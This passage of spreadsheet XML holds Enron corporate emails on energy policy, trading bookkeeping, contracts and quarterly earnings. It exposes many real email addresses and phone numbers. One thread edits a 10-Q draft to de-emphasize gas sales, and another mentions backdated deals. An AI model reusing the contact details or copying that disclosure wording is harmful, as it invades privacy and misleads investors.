Richard  Ring     (eesi)</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 22:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dan.leff@enron.com'})</t>
  </si>
  <si>
    <t>Re: Demand-side buy down proposal</t>
  </si>
  <si>
    <t xml:space="preserve">EES team - _x000D_
_x000D_
Please see attached note and information.  Please coordinate a response in a _x000D_
timely manner.  Weiss / Dobler - you are on point. Please also review the _x000D_
names and companies associated with the original e-mail.  _x000D_
Spoke with Rick Shapiro via voice mail last night.  Ken Lay follow up to _x000D_
Governor Davis not due for several days, due to current focus of all _x000D_
principals in California.  Let's discuss appropriate timing at our meeting _x000D_
this afternoon._x000D_
_x000D_
_x000D_
Thank you - Dan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Jeff Dasovich@ENRON on 01/16/2001 11:41 PM_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: Dennis Benevides/HOU/EES@EES, Richard Shapiro/NA/Enron@Enron, _x000D_
skean@enron.com, Sandra McCubbin/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, _x000D_
Karen Denne/Corp/Enron@ENRON, Tim Belden/HOU/ECT@ECT, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Paul Kaufman/PDX/ECT@ECT, Dan Leff/HOU/EES@EES, _x000D_
James D Steffes/NA/Enron@Enron, Harry Kingerski/NA/Enron@Enron, Alan _x000D_
Comnes/PDX/ECT@ECT, Mary Hain/HOU/ECT@ECT, Sarah Novosel/Corp/Enron@ENRON, _x000D_
Scott Stoness/HOU/EES@EES, Wanda Curry/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, _x000D_
Christian Yoder/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Demand-side buy down proposal _x000D_
_x000D_
Greetings:_x000D_
_x000D_
See attached "meeting notice."  This could be a good opportunity to get our _x000D_
demand-side proposal on the table.  _x000D_
_x000D_
Dennis:  If we could get some power point slides together, we could present _x000D_
our ideas to this group and the leg aides mentioned.  Let me know your _x000D_
thoughts. _x000D_
_x000D_
Also attached is a summary of the bill that the CA Assembly passed today.  _x000D_
Please pass this along to others who might be interested. Thanks._x000D_
_x000D_
Jeff_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 01/16/2001 11:32 PM -----_x000D_
_x000D_
	Julia Wright &lt;jwright@smithandkempton.com&gt;_x000D_
	01/16/2001 08:21 PM_x000D_
		 _x000D_
		 To: "'Aaron Thomas'" &lt;athomas@newenergy.com&gt;, "'Allan Lippincott'" _x000D_
&lt;alippin@mail.arco.com&gt;, "'Ann Cohn (e-mail)'" &lt;cohnap@sce.com&gt;, "'Ann Watson _x000D_
(e-mail)'" &lt;anw@cpuc.ca.com&gt;, "'Anna Ferrera (e-mail)'" _x000D_
&lt;Anna.Ferrera@SEN.CA.GOV&gt;, "'Art Carter (e-mail)'" &lt;debinorton@aol.com&gt;, _x000D_
"'assistant to John Fielder'" &lt;moravekj@sce.com&gt;, "'Barbara Barkovich _x000D_
(e-mail)'" &lt;brbarkovich@earthlink.net&gt;, "'Bekcy Kilbourne (e-mail)'" _x000D_
&lt;bakilbourne@calpx.com&gt;, "'Bill Booth (e-mail)'" &lt;wbooth@booth-law.com&gt;, _x000D_
"'Bill Dombrowski (e-mail)'" &lt;cra@calretailers.com&gt;, "'Bill Keese (e-mail)'" _x000D_
&lt;wkeese@energy.state.ca.us&gt;, "'Bill Zobel (e-mail)'" &lt;bzobel@mail.arco.com&gt;, _x000D_
"'Bob Foster (e-mail)'" &lt;fosterrg@sce.com&gt;, "'Bob Houston (e-mail)'" _x000D_
&lt;houstgrp@pacbell.net&gt;, "'Carolyn McIntyre (e-mail)'" &lt;cmcintyre@sempra.com&gt;, _x000D_
"'Carolyn Veal-Hunter (e-mail)'" &lt;carolyn.veal-hunter@asm.ca.gov&gt;, _x000D_
"'Catherine Hackney (e-mail)'" &lt;hacknece@sce.com&gt;, "'Charles Bacchi _x000D_
(e-mail)'" &lt;charles.bacchi@asm.ca.gov&gt;, "'Craig Brown (e-mail)'" _x000D_
&lt;brownc@epenergy.com&gt;, "'Dan Carroll (e-mail)'" &lt;dcarroll@dbsr.com&gt;, "'Denice _x000D_
Cazalet (e-mail)'" &lt;dcazalet@apx.com&gt;, "'Dennis Price (e-mail)'" _x000D_
&lt;priced@chevron.com&gt;, "'Denny Samuel (e-mail)'" &lt;dsam@chevron.com&gt;, "'Dominic _x000D_
DiMare (e-mail)'" &lt;dominic.DiMare@calchamber.com&gt;, "'Dorothy Rothrock _x000D_
(email)'" &lt;drothrock@cmta.net&gt;, "'Ed Yates (e-mail)'" &lt;ed@clfp.com&gt;, "'Eloy _x000D_
Garcia (e-mail)'" &lt;egarcia@ka-pow.com&gt;, "'Evelyn Elsesser (e-mail)'" _x000D_
&lt;eke@aelaw.com&gt;, "'Gary Heath (e-mail)'" &lt;gheath@eob.ca.gov&gt;, "'Gordon _x000D_
McDonald (e-mail)'" &lt;gordon.mcdonald@pacificorp.com&gt;, "'Jack Flanigan _x000D_
(e-mail)'" &lt;jackflanigan@flaniganlaw.com&gt;, "'Jack Gualco (e-mail)'" _x000D_
&lt;Jackson_Gualco@gualcogroup.com&gt;, "'Jack Stewart (email)'" _x000D_
&lt;jstewart@cmta.com&gt;, "'James Boyd (e-mail)'" &lt;jim@resources.ca.gov&gt;, "'Jan _x000D_
Smutny-Jones (e-mail)'" &lt;smutny@iepa.com&gt;, "'Jeff Dasovich (e-mail)'" _x000D_
&lt;jdasovic@enron.com&gt;, "'Jerry Jordan (e-mail)'" &lt;jordan@cmua.org&gt;, "'Jim _x000D_
Cassie (e-mail)'" &lt;jcassie@sempra.com&gt;, "'Jim Groniger (e-mail)'" _x000D_
&lt;gronign@texaco.com&gt;, "'Joe Lyons (e-mail)'" &lt;joseph.lyons@asm.ca.gov&gt;, "'Joe _x000D_
Ronan (e-mail)'" &lt;joer@calpine.com&gt;, "'John Bridges (e-mail)'" _x000D_
&lt;bridgesj@epenergy.com&gt;, "'John Fielder (e-mail)'" &lt;fielderjr@sce.com&gt;, _x000D_
"'John Fistolera (e-mail)'" &lt;johnf@ncpa.com&gt;, "'John Larrea (e-mail)'" _x000D_
&lt;jgl@cpuc.ca.gov&gt;, "'John Rozsa (e-mail)'" &lt;John.Rozsa@sen.ca.gov&gt;, "'John _x000D_
White (e-mail)'" &lt;vjw@cleanpower.org&gt;, "'Joseph Alamo'" &lt;jalamo@enron.com&gt;, _x000D_
"'Julia Wright'" &lt;jwright@smithandkempton.com&gt;, "'Karen Edson (e-mail)'" _x000D_
&lt;kedson@ns.net&gt;, "'Karen Jarrell (e-mail)'" &lt;kjarrell@smurfit.com&gt;, "'Karen _x000D_
Koyano (e-mail)'" &lt;kykoyano@calpx.com&gt;, "'Karen Lindh (e-mail)'" _x000D_
&lt;karen@klindh.com&gt;, "'Karen Mills (e-mail)'" &lt;kmills@cfbf.com&gt;, "'Kari _x000D_
harteloo (e-mail)'" &lt;klc@aelaw.com&gt;, "'Kathy Brandenburg (e-mail)'" _x000D_
&lt;katherinebrandenburg@flaniganlaw.com&gt;, "'Kay Grosulak (e-mail)'" _x000D_
&lt;kgrosulak@sppc.com&gt;, "'Keith McCrea (e-mail)'" &lt;kmccrea@sablaw.com&gt;, "'Kevin _x000D_
Lynch (e-mail)'" &lt;Kevin.Lynch@pacificorp.com&gt;, "'Kevin Smith (e-mail)'" _x000D_
&lt;kevins@ncpa.com&gt;, "'Lawrence Lingbloom (e-mail)'" _x000D_
&lt;lawrence.lingbloom@sen.ca.gov&gt;, "'Lenny Goldberg (e-mail)'" _x000D_
&lt;iga@mother.com&gt;, "'Louis Szablya (e-mail)'" &lt;szablyal@epenergy.com&gt;, "'Marc _x000D_
Joseph (e-mail)'" &lt;mdjoseph@adamsbroadwell.com&gt;, "'Mark Monagan (Calpine)'" _x000D_
&lt;mrmonagan@aol.com&gt;, "'Marwan Masri (e-mail)'" &lt;mmasri@energy.state.ca.us&gt;, _x000D_
"'Mary McDonald (e-mail)'" &lt;memcdonald@calpx.com&gt;, "'Michael Alcantar _x000D_
(e-mail)'" &lt;mpa@aelaw.com&gt;, "'Mike Florio (e-mail)'" &lt;mflorio@turn.org&gt;, _x000D_
"'Mike Kahl (e-mail)'" &lt;mikahl@ka-pow.com&gt;, "'Mona Petrochko (e-mail)'" _x000D_
&lt;mpetroch@enron.com&gt;, "'Pete Conaty (e-mail)'" &lt;pcaceo@pacbell.net&gt;, "'Phil _x000D_
Nails (e-mail)'" &lt;pstohr@dbsr.com&gt;, "'Ralph Cavanagh (e-mail)'" _x000D_
&lt;rcavanagh@nrdc.org&gt;, "'Randy Chinn (e-mail)'" &lt;randy.chinn@sen.ca.gov&gt;, _x000D_
"'Ray Thompson (e-mail)'" &lt;ray.thompson@sen.ca.gov&gt;, "'Rick Counihan'" _x000D_
&lt;rick.counihan@greenmountain.com&gt;, "'Robert Berry (e-mail)'" &lt;berry@apx.com&gt;, _x000D_
"'Robin Larson (e-mail)'" &lt;rlarson@caiso.com&gt;, "'Sheryl Carter (e-mail)'" _x000D_
&lt;scarter@nrdc.org&gt;, "'Steve Pike (e-mail)'" &lt;pikes@epenergy.com&gt;, "'Stu _x000D_
Wilson (e-mail)'" &lt;swilson@cmua.org&gt;, "'Sue Mara (e-mail)'" _x000D_
&lt;smara@enron.com&gt;, "'Susan Reeder (e-mail)'" &lt;sreeder@sppc.com&gt;, "'Terry _x000D_
Winter (e-mail)'" &lt;twinter@caiso.com&gt;, "'Thomas Dinkel (e-mail)'" _x000D_
&lt;tdinkel@retx.com&gt;, "'Tim Schmelzer (e-mail)'" &lt;tschmelz@energy.state.ca.us&gt;, _x000D_
"'Tommy Ross (e-mail)'" &lt;rosst@sce.com&gt;, "'Tony Braun (e-mail)'" _x000D_
&lt;braun@cmua.org&gt;, "'Victoria Schaefer (e-mail)'" &lt;schaefvl@sce.com&gt;_x000D_
		 cc: "'dhunter@smithandkempton.com'" &lt;dhunter@smithandkempton.com&gt;, _x000D_
"'pbray@newpower.com'" &lt;pbray@newpower.com&gt;_x000D_
		 Subject: IMPORTANT MEETING NOTICE_x000D_
_x000D_
_x000D_
_x000D_
Folks-- Urgent info attached for our meeting on Thursday_x000D_
_x000D_
Thanks, Delaney Hunter_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Meeting notice.doc_x000D_
 - AB1 X1 analysis.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 13:02:42 -0800 (PST)</t>
  </si>
  <si>
    <t>Copier Commitment Information Requested</t>
  </si>
  <si>
    <t>Houston Offices Bankrupt and Non-Bankrupt Business Units:_x000D_
If you own, lease, rent, or receive invoices for copiers or have questions regarding copiers _x000D_
Please call Harry Grubbs at 713-853-5417, or harry.grubbs@enron.com._x000D_
_x000D_
_x000D_
All Bankrupt entities outside Houston, or other Offices outside Houston that are closing:_x000D_
If you own, lease, rent, or receive invoices for copiers or have questions regarding copiers _x000D_
Please contact Paula Corey at 713-853-9948, or paula.corey@enron.com._x000D_
_x000D_
_x000D_
Non-Bankrupt Entities Outside Houston:_x000D_
Please call Harry Grubbs at 713-853-5417, or harry.grubbs@enron.com.</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 09:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Gas Curves</t>
  </si>
  <si>
    <t xml:space="preserve">Please read below, it looks as though we have about 4 curves on this list.  _x000D_
If you set this curve, please fill out the form attached below.  Shout with _x000D_
any questions - due date is Thursday a.m._x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 04/24/2001 _x000D_
04:57 PM ---------------------------_x000D_
_x000D_
_x000D_
Jeffrey C Gossett_x000D_
04/24/2001 04:44 PM_x000D_
To: Kam Keiser/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT, Darron C _x000D_
Giron/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Gas Curves_x000D_
_x000D_
Please look over the following and reply to Burtonif you need to add curves._x000D_
---------------------- Forwarded by Jeffrey C Gossett/HOU/ECT on 04/24/2001 _x000D_
04:42 PM ---------------------------_x000D_
From: Burton McIntyre/ENRON@enronXgate on 04/24/2001 04:38 PM_x000D_
To: Jeffrey C Gossett/HOU/ECT@ECT_x000D_
cc: Shona Wilson/NA/Enron@Enron, Chris Abel/HOU/ECT@ECT, Susan D _x000D_
Trevino/HOU/ECT@ECT, Frank Hayden/ENRON@enronXgate, Christy _x000D_
Lobusch/NA/Enron@Enron, Nancy Hernandez/NA/Enron@ENRON _x000D_
Subject: Gas Curves_x000D_
_x000D_
Jeff, attached is a file containing gas curves that have been identified as _x000D_
being not in the RisktRAC system.  Curves were found to be missing from  the _x000D_
Benchmark mapping table and/or the Primary/Secondary curve table.  Curves _x000D_
missing from RisktRAC could have a significant impact on positions and V@R.  _x000D_
Please let us know by Thursday, April 26th, if these curves should be added _x000D_
to the RisktRAC system.   For those curves that need to be added to RisktRAC, _x000D_
a blank curve request form is also attached. Thank you._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
SIncerely,_x000D_
_x000D_
BM_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Feb 2000 07:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Charlie Weldon</t>
  </si>
  <si>
    <t>Charlene,_x000D_
_x000D_
Thank you for accomodating our request to start Charlie Weldon in his _x000D_
rotation in the Research Group earlier than the incoming Associate official _x000D_
start date of August 7th._x000D_
_x000D_
As we discussed, the business purpose for this request is related to the _x000D_
project we have earmarked for him, which is linked to the hurricane season, _x000D_
which starts in June._x000D_
_x000D_
And you have my e-handshake that we will release him to participate in the _x000D_
regularly organized orientation activities scheduled for August._x000D_
_x000D_
We expect he will report on Wednesday, June 21st._x000D_
_x000D_
Thanks again,_x000D_
_x000D_
_x000D_
-- Mike Roberts</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 10:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'vikas.dwivedi@enron.com'})</t>
  </si>
  <si>
    <t>Re: Commodity Trading Account</t>
  </si>
  <si>
    <t xml:space="preserve">Vikas - _x000D_
_x000D_
Thanks for your note.  Enron does have a policy that somewhat restricts the _x000D_
trading that may be done by employees - even when they are not involved in a _x000D_
trading function.  No Enron employee is permitted to trade any commodity for _x000D_
their own account (or for the account of another) which Enron trades.  The _x000D_
only general exceptions to this are for equity and debt securities - and _x000D_
there are special restrictions on persons who trade those items for Enron.  _x000D_
This policy is modified from time to time by the Enron Corp. Board of _x000D_
Directors and is monitored by the Risk Assessment and Control Group.  I _x000D_
believe Cassandra Schultz currently has that responsibility.  I am sending _x000D_
her a copy of this e-mail (so in case I have misrepresented the policy in _x000D_
some way, Cassandra please correct me) and if you need any further _x000D_
information, please contact her._x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
	Vikas Dwivedi@ENRON_x000D_
	02/20/2001 04:08 PM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Commodity Trading Account_x000D_
_x000D_
Mark,_x000D_
_x000D_
I am interested in opening a personal commodity trading account.  I'm not _x000D_
involved in a trading function here at Enron.  My manager Jennifer Fraser _x000D_
suggested I write you to find out what steps I need to take to ensure _x000D_
compliance before I open the account._x000D_
_x000D_
Your guidance on the subject is appreciated._x000D_
_x000D_
Thanks, Vikas_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 06:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alvin.thompson@enron.com'})</t>
  </si>
  <si>
    <t>Gas Daily Bookout</t>
  </si>
  <si>
    <t>I just updated the volumes on deals 523444 and 523459 for the 12th.  This is _x000D_
a bookout.  The volumes on these deals should always match, if they don't _x000D_
then I goofed.</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 05:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.chandler@enron.com'})</t>
  </si>
  <si>
    <t>Re: Enron 3rd Qtr 00- 10Q</t>
  </si>
  <si>
    <t xml:space="preserve">You're right that AA insisted on the reference to it being a sale from _x000D_
storage. Remember we are explaining a variance in NET revenues, not GROSS _x000D_
revenues. An ordinary sale wouldn't generate enough NET revenue to cause a _x000D_
variance that needs to be explained._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           11/03/2000 08:31 AM_x000D_
	_x000D_
_x000D_
To: Bob Chandler/ET&amp;S/Enron@ENRON_x000D_
cc: Rod Hayslett/FGT/Enron@Enron, Tracy Geaccone/GPGFIN/Enron@ENRON, Harry _x000D_
Walters/ET&amp;S/Enron@Enron, Dave Neubauer/ET&amp;S/Enron@ENRON, Kent _x000D_
Miller/ET&amp;S/Enron@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Re: Enron 3rd Qtr 00- 10Q  _x000D_
_x000D_
Ugh.  Do we need to say "from storage inventory" or can we just mention gas _x000D_
sales?  I seem to recall that we already discussed that and the accountants _x000D_
wanted to mention the source of the sold gas, but if I'm wrong, lets make the _x000D_
reference less specific.  Thanks. DF    _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Bob Chandler                           11/03/2000 07:48 AM_x000D_
	_x000D_
_x000D_
To: Rod Hayslett/FGT/Enron@Enron, Tracy Geaccone/GPGFIN/Enron@ENRON, Drew _x000D_
Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Harry Walters/ET&amp;S/Enron@Enron _x000D_
_x000D_
Subject: Enron 3rd Qtr 00- 10Q_x000D_
_x000D_
Here are the paragraphs in the 3QTR 10Q relative to ETS that contain _x000D_
references to our base gas sales.  We have suggested the change shown to _x000D_
de-emphasize the fact that there were sales in both years.   Do you want to _x000D_
suggest any further changes in the next draft we receive for review?_x000D_
---------------------- Forwarded by Bob Chandler/ET&amp;S/Enron on 11/03/2000 _x000D_
07:44 AM ---------------------------_x000D_
_x000D_
_x000D_
Allen Joe_x000D_
11/01/2000 02:15 PM_x000D_
To: Bob Chandler/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Enron 3rd Qtr 00- 10Q_x000D_
_x000D_
Attached are proposed changes to Enron's 10Q for 3rd Qtr 00 on ETS net _x000D_
revenues section._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 02:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Deal 217769</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  I changed the meter number on this deal from IMB-508914 to 9170.  They _x000D_
are both Trco Non NY.  </t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 06:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">They are good deals, but we don't have deal numbers because Mike is out of _x000D_
the office right now and said he wanted to check with the broker personally _x000D_
before verifying the price. He's aware that the deals will have to go in late _x000D_
and be backdated, and that they will not be in his calculation for the day. _x000D_
Please let me know if there's anything else I can do._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
01/05/2001 02:23 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
Are these good deals for Mike? _x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Evelyn Metoyer/Corp/Enron on 01/05/2001 _x000D_
04:18 PM ---------------------------_x000D_
_x000D_
_x000D_
Evelyn Metoyer_x000D_
01/05/2001 03:45 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
Can you check Mike Swerzbin for the following deals through Prebon:_x000D_
_x000D_
Enron sells Sempra 50 mw of Sept.'01  Mid-C at $360.00_x000D_
Enron buys Sempra 50 mw of July '01 Mid-C at $270.00_x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 08:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Kate this is a new file as of 2:30 today.  The previous one was from this _x000D_
morning._x000D_
---------------------- Forwarded by Mark Confer/HOU/ECT on 05/02/2001 03:18 _x000D_
PM ---------------------------_x000D_
To: Mark Confer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: latest file_x000D_
_x000D_
see attached._x000D_
_x000D_
_x000D_
_x000D_
bc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Mar 2002 13:41:04 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: CQG Update</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Germany, Chris  _x000D_
Sent:	Monday, March 04, 2002 2:04 PM_x000D_
To:	Corey, Paula_x000D_
Subject:	RE: CQG Update _x000D_
_x000D_
Please take away my access.  And I believe the following people are no longer with Enron, Martin Cuilla, Brad McKay, Denver Plachy, Sylvia Pollan, and Kevin Ruscitti._x000D_
_x000D_
Thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Corey, Paula  _x000D_
Sent:	Monday, March 04, 2002 1:51 PM_x000D_
To:	Arora, Harry; Bond, Ragan; Broderick, Paul J.; Chilkina, Elena; Cuilla, Martin; De La Ossa, Mario; Des Champs, Joseph; Driscoll-Ernest, Marde L.; Harrell, Willie; Germany, Chris; Gilbert-smith, Doug; Herndon, Rogers; Herndon, Rogers; Hewitt, Jess P.; Jenkins, Alicia; Jenkins, Beth; Knoblauh, Jay; Lagrasta, Fred; Mckay, Brad; Misra, Narsimha; Misra, Narsimha; Modi, Rishi; Plachy, Denver; Pollan, Sylvia S.; Ruscitti, Kevin; Shahi, Pushkar; Shireman, Kristann; Vanderhorst, Barry; Vanderhorst, Barry; Nielsen, Jeff; Perez, Agustin; Perez, Agustin; Burnham, Steven_x000D_
Cc:	Hartstein, Roy; Harrington, Stephen_x000D_
Subject:	CQG Update _x000D_
_x000D_
All -_x000D_
_x000D_
You are receiving this email because you are listed as a current CQG user. The Market Data group is in the process of re-negotiating our existing contract. The approximate ongoing cost for your workstation will be $545.00 per month excluding taxes, exchange fees, and circuit costs. Our monthly cost for circuits is approximately $1600.00 and will be divided among all remaining users._x000D_
_x000D_
Please respond to this email with your company number and RC indicating your ongoing acceptance prior to March 11._x000D_
_x000D_
Thank you_x000D_
_x000D_
Paula Corey_x000D_
Sr. Contracts Manager</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 07:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron - State Regulation of Online Gaming</t>
  </si>
  <si>
    <t>Good news.  Milbank's research has confirmed the advice provided by Sullivan _x000D_
and Cromwell that the game will not vioate gaming or lottery rules or the _x000D_
like in the US, with the exception of the states of Florida and New York._x000D_
_x000D_
Leslie_x000D_
----- Forwarded by Leslie Hansen/HOU/ECT on 08/15/2000 02:04 PM -----_x000D_
_x000D_
	APelton@milbank.com_x000D_
	08/15/2000 01:41 PM_x000D_
		 _x000D_
		 To: leslie.hansen@enron.com_x000D_
		 cc: EFeo@milbank.com, DHudanish@milbank.com, SMiller@milbank.com_x000D_
		 Subject: Enron - State Regulation of Online Gaming_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Ms. Hansen: _x000D_
_x000D_
Please find attached for your review a memo regarding the regulation of _x000D_
online gaming in the most significant U.S. jurisdictions.? If you have any _x000D_
questions or comments regarding this matter, please do not hesitate to _x000D_
contact me._x000D_
_x000D_
Sincerely, _x000D_
_x000D_
August W. Pelton _x000D_
Milbank, Tweed, Hadley &amp; McCloy _x000D_
(213) 892-4345 _x000D_
(213) 892-4745 (fax) _x000D_
_x000D_
_x000D_
 &lt;&lt;3_KB802!.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3_KB802!.doc</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 07:25:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>Third Quarter Earnings Results</t>
  </si>
  <si>
    <t>_x000D_
Today, we announced our third quarter earnings results, which were right on target with analysts estimates for recurring earnings per diluted share of $0.43.  This marks a 26 percent increase over the third quarter of last year, which is due to the strong performance of our core wholesale and retail energy businesses and our natural gas pipelines.  In addition, we also announced that we are on track for our earnings target of $0.45 for the fourth quarter ($1.80 for 2001) and $2.15 for 2002._x000D_
_x000D_
We made a commitment to you that we would provide you with timely information about Enron's business strategy and performance, so this email is intended to provide an explanation about our earnings this quarter._x000D_
_x000D_
Over the past few months, we have met with analysts to discuss Enron's performance.  We received considerable feedback from investors and analysts that we needed to expand our financial reporting to include details for more of our business units.  In response to that feedback, we have provided results separately for several of our business units.  For example, while we have provided volume figures for North America and Europe, this is the first quarter we have provided financials separately for Enron Americas and for Europe and Other Commodities.  In addition, information about our global assets had previously been included in our numbers for Wholesale Services.  This quarter they are reported separately.   Finally, even though our broadband business is now part of Enron Wholesale Services, we are continuing to report that business separately._x000D_
_x000D_
Following are the highlights of our businesses:_x000D_
_x000D_
Wholesale Services: Total income before interest, minority interests and taxes (IBIT) increased 28% to $754 million in the third quarter.  Total wholesale physical volumes increased 65% to 88.2 trillion British thermal units equivalent per day (Tbtue/d)._x000D_
Americas: IBIT increased 31% to $701 million.  Natural gas volumes increased 6% to 26.7 Tbtu/d, and power volumes increased 77% to 290 million megawatt hours (MWh)._x000D_
Europe and Other Commodity Markets: IBIT remained unchanged at $53 million as compared to last year.  While physical gas and power volumes increased, low volatility in these markets caused profitability to remain flat._x000D_
_x000D_
Retail Services: Enron Energy Services reported IBIT of $71 million, compared to $27 million a year ago.  So far this year, EES has completed more than 50 transactions with large customers and more than 95,000 deals with small business customers._x000D_
_x000D_
_x000D_
Transportation and Distribution:_x000D_
	Natural Gas Pipelines: IBIT increased slightly to $85 million in the third quarter._x000D_
Portland General: We reported an IBIT loss of $(17) million this quarter compared to IBIT of $74 million a year ago.  This loss is due to power contracts PGE entered into at prices that were significantly higher than actual settled prices during the third quarter.  Last week, we  announced an agreement to sell PGE to Northwest Natural.  This transaction is expected to close next year._x000D_
Global Assets: This segment includes Elektro, Dabhol, TGS, Azurix and Enron Wind.  Third quarter IBIT remained unchanged at $19 million compared to last year._x000D_
_x000D_
Broadband Services: IBIT losses were $(80) million in the current quarter compared to a $(20) million loss last year.  This quarter's results include significantly lower investment-related income and lower operating costs._x000D_
_x000D_
Corporate and other: This segment includes the unallocated expenses associated with general corporate functions. This segment reported an IBIT loss of $(59) million compared to $(106) million a year ago._x000D_
_x000D_
In addition, this quarter we announced one-time charges of $1.01 billion.  Over the past few quarters, we have conducted a thorough  review of our businesses and have decided to take certain charges to clear away issues that have clouded the performance and earnings potential  of our core businesses.  These charges include:_x000D_
?	A $287 million write-down of Azurix Corp._x000D_
?	$183 million associated with the restructuring of Broadband Services.  This includes severance costs, a loss on the sale of inventory like servers and routers, and a write-down of the value of our content services contracts due to the bankruptcy of a number of customers._x000D_
?	$544 million related to losses from certain investments, primarily Enron's interest in The New Power Company, broadband and technology investments and early termination of a structured finance arrangement.  _x000D_
_x000D_
With our announcements this quarter we accomplished three things:  1) we showed continued strong earnings and earnings growth in our core businesses, 2) we cleared away those things that were clouding this superb performance in our core businesses, and 3) We expanded our reporting of financial results to increase transparency for our investors. To read the full earnings press release, go to www.enron.com/corp/pressroom/releases.</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 09:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: natural gas</t>
  </si>
  <si>
    <t xml:space="preserve">I don't see anything technically wrong with the document, but I struggle to _x000D_
see the point of it.  Most people are not going to care about our industry's _x000D_
problem; they are going to be interested in solutions.  We should be telling _x000D_
them what the answer is -- eg forward prices are lower; there is an _x000D_
opportunity to buy forward now and protect yourself from volatility; etc.  _x000D_
What do you think?_x000D_
_x000D_
_x000D_
_x000D_
	Peggy Mahoney@EES_x000D_
	11/28/2000 05:27 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Maureen McVicker/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: natural gas_x000D_
_x000D_
Can you please review?  We'd like to send as an informational_x000D_
piece to our California customers.   Prices are up to $14 today_x000D_
and not expected to drop anytime soon.  We're using this letter_x000D_
and follow-up calls to try to curtail load.  I can explain further if_x000D_
needed._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 02:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EOL Credit Responses 07/24/00</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 07/25/2000 09:36 AM -----_x000D_
_x000D_
	Tom Moran_x000D_
	07/24/2000 06:04 PM_x000D_
		 _x000D_
		 To: Frank L Davis/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Sheri _x000D_
Thomas/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Bernice Rodriguez/HOU/ECT@ECT, _x000D_
Brant Reves/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, David _x000D_
Hardy/LON/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, Lisa Gillette/HOU/ECT@ECT, _x000D_
